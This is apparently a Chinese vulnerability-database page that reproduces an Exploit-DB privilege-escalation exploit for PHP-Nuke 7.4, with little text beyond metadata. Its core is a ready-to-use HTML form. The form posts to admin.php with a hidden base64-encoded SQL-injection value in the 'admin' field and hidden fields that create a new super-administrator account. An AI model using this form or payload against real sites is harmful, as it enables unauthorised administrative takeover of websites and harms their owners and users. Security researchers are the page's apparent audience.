PHP-Nuke 7.4 – Privilege Escalation

36次阅读
没有评论

PHP-Nuke 7.4 – Privilege Escalation

漏洞ID 1054597 漏洞类型
发布时间 2004-09-08 更新时间 2004-09-08
PHP-Nuke 7.4 - Privilege EscalationCVE编号 N/A
PHP-Nuke 7.4 - Privilege EscalationCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/436
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
A demonstration exploit HTTP form is provided:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME: 
<input type="text" name="add_aid">
<br>
NOME: 
<input type="text" name="add_name">
<br>
PASSWORD: 
<input type="text" name="add_pwd">
<br>
E-MAIL: 
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

# milw0rm.com [2004-09-08]

相关推荐: myServer File Disclosure Vulnerability

myServer File Disclosure Vulnerability 漏洞ID 1101099 漏洞类型 Input Validation Error 发布时间 2002-12-11 更新时间 2002-12-11 CVE编号 N/A CNNVD-ID…

正文完
 0